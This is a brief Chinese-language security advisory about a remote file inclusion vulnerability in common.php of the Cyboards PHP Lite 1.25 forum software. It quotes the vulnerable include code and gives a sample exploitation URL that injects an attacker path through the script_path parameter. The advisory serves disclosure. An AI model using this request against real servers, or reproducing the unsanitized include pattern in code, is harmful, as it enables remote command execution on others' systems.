CyBoards PHP Lite系统中common.php远程文件包含漏洞

2011-3-25 19:56:19 来源:网络转载 浏览:120
CyBoards PHP Lite系统中common.php远程文件包含漏洞
出现版本:Cyboards PHP Lite 1.25

程序介绍: Cyboards PHP Lite是一款基于WEB的论坛程序。

漏洞分析: Cyboards PHP Lite的common.php文件中存在远程文件包含漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
相关的漏洞代码如下:
include("/home/www/forums/include/config.php");
include($script_path."/db/mysql.php");

漏洞利用: http://www.target.com/path/include/common.php?script_path=CmdShell

解决方案:
开发厂商:Cyboards
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.gold-sonata.com/index ... /forums&menu=script
(0)
(0)